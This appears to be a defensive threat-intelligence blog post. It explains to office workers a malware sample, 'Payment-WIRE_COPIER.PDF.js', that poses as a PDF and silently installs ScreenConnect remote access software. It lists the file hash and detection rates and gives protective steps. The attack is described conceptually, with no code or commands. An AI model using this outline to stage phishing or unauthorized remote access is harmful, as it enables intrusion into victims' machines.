This article was originally published on ThreatChain — decentralized threat intelligence.
What ConnectWise is, how it works, and how to defend against it.
Picture this: It's a Monday morning. You're the office manager at a mid-size company in Stockholm, plowing through emails. One catches your eye — the subject line says something about a wire payment and a copier invoice. There's an attachment: Payment-WIRE_COPIER.PDF.js. Looks like a PDF. You double-click.
Nothing visible happens. No document opens. You shrug, maybe try again, then move on with your day.
But something did happen. In those few quiet seconds, a script ran in the background and started installing remote access software on your machine — the kind IT departments use every day to manage computers. Except in this case, your IT team didn't install it. Someone else now has a remote control to your computer, and they can see your screen, move your mouse, browse your files, and come back any time they want.
This is the story of a real malware sample spotted in early April 2026, and it's a clever one. Let's break down what it does, why it's hard to catch, and what you can do about it.
What Is This Thing, Exactly?
The file — Payment-WIRE_COPIER.PDF.js — is a JavaScript file pretending to be a PDF. That .PDF.js double extension is a classic trick. On many Windows machines, the system hides the last extension, so all you see is Payment-WIRE_COPIER.PDF. It looks completely normal.
But it's not a document. It's a script — a small program your computer will run if you open it.
Here's where it gets interesting. The script's goal isn't to install some exotic, never-before-seen virus. Instead, it installs ConnectWise ScreenConnect — a completely legitimate remote management tool that thousands of IT professionals use every day to help employees, fix computers, and manage networks.
Think of ScreenConnect like a spare key to your house. When your landlord has one, it's fine — you trust them. But if a stranger makes a copy and lets themselves in while you're at work? Same key, very different situation.
Security researchers call this category of software RMM tools — Remote Monitoring and Management. They're built to let someone control a computer from far away. When a criminal installs one without your knowledge, it becomes one of the most effective backdoors imaginable, because your antivirus software often trusts it. After all, it's a real, signed, legitimate application.
Why This Attack Is Sneaky (Even by Malware Standards)
A few things make this sample particularly tricky:
1. The code is scrambled on purpose.
The JavaScript inside the file has been run through an obfuscation tool — think of it like writing a letter in a code language so only the intended recipient can read it. Security tools that scan files looking for known bad patterns have a harder time recognizing what the script actually does. Two detection rules (called YARA rules) flagged this sample specifically for suspicious obfuscation and for using PowerShell — a powerful built-in Windows tool that the script likely calls to download and install ScreenConnect silently.
2. It abuses trust.
Once ScreenConnect is installed, the attacker has a tool that looks identical to what a legitimate IT admin would use. Many security products won't flag it. It's like a burglar wearing a uniform from your building's maintenance company — the security guard waves them right through.
3. Detection rates are low.
When this file was first scanned across 76 different antivirus engines, only 14 out of 76 flagged it as malicious. That means over 80% of security tools let it through. Kaspersky and Spamhaus flagged it. FileScan rated it "likely malicious." But the majority? Silence.
Who's at Risk, and What's the Real Damage?
This sample was first seen originating from Sweden, but the technique is used globally. The targets tend to be:
- Small and mid-size businesses that don't have dedicated security teams
- Finance and accounting departments (the "payment wire" lure is aimed squarely at them)
- Anyone who handles invoices, payments, or vendor communications by email
Once an attacker has ScreenConnect running on your machine, they can:
- Watch your screen in real time — see passwords you type, emails you read, banking sessions you open
- Browse and steal files — client lists, contracts, financial records, anything on your hard drive or network shares
- Install additional malware — ransomware (digital kidnapping of your files), keyloggers, or tools to move deeper into your company's network
- Come back whenever they want — ScreenConnect is designed to survive reboots and persist quietly. It's the malware's way of hiding a spare key under your doormat so it can return after you think you've cleaned up.
For a small business, this could mean a drained bank account, a data breach you're legally required to report, or a ransomware attack that shuts down operations for days.
The Technical Fingerprint
For anyone who wants to check their systems or share this with their IT provider, here are the specifics:
| Detail | Value |
|---|---|
| File name | Payment-WIRE_COPIER.PDF.js |
| File type | JavaScript (.js) |
| File size | ~16 KB |
| SHA-256 hash | 5bbb1e4d714fac5f326d55fff88e1267f537121d64cb4ba488bb3f7a7215021a |
| First seen | April 6, 2026 |
| Detection rate | 14 out of 76 antivirus engines |
| Flagged by | Kaspersky (Malware), Spamhaus (Malicious), FileScan (Likely Malicious) |
| Malware family | ConnectWise / ScreenConnect (abused legitimate RMM tool) |
A SHA-256 hash is like a fingerprint for a file — if you have this exact file on your system, it will produce this exact hash. Your IT team can search for it.
What You Can Do Right Now
You don't need a million-dollar security budget to protect yourself from this. Here are five concrete steps:
1. Never open .js files from email. There is almost no legitimate reason for someone to send you a JavaScript file as an attachment. If you see .js at the end of a file name — or a suspicious double extension like .PDF.js — delete the email. If you think it might be real, call the sender directly to confirm.
2. Make Windows show file extensions. By default, Windows hides file extensions, which is exactly what makes the .PDF.js trick work. Go to File Explorer → View → check "File name extensions." Now you'll always see the real file type.
3. Check for unauthorized ScreenConnect installations. Ask your IT team (or check yourself): is ConnectWise ScreenConnect installed on any machines where it shouldn't be? Look for services or programs called "ScreenConnect" or "ConnectWise Control" that nobody in your organization set up. If you find one and your IT team didn't install it, treat it as a breach.
4. Keep your antivirus updated and use email filtering. This sample slipped past most antivirus engines at first, but detection improves rapidly once a sample is identified. Keeping your security tools current means you benefit from those updates. If your email provider offers attachment scanning or filtering, make sure it's turned on and configured to block or quarantine script files.
5. Talk to your team. The most effective defense against this kind of attack is a 10-minute conversation. Tell your colleagues: "If you get an unexpected email about a payment or invoice with an attachment, don't open the attachment. Forward it to me (or IT) first." That one habit stops this entire attack chain cold.
The Bigger Picture
This sample is part of a growing trend where attackers don't bother building custom spy tools from scratch. Why would they, when perfectly good remote access software already exists and is trusted by security products? By wrapping the installation in an obfuscated script and disguising it as a financial document, they've built an attack that's cheap, effective, and hard to detect.
The good news? The attack requires you to open that file. That moment of hesitation — "Wait, why is a PDF actually a .js file?" — is your best firewall.
Stay curious. Stay skeptical. And when in doubt, don't double-click.
Top comments (0)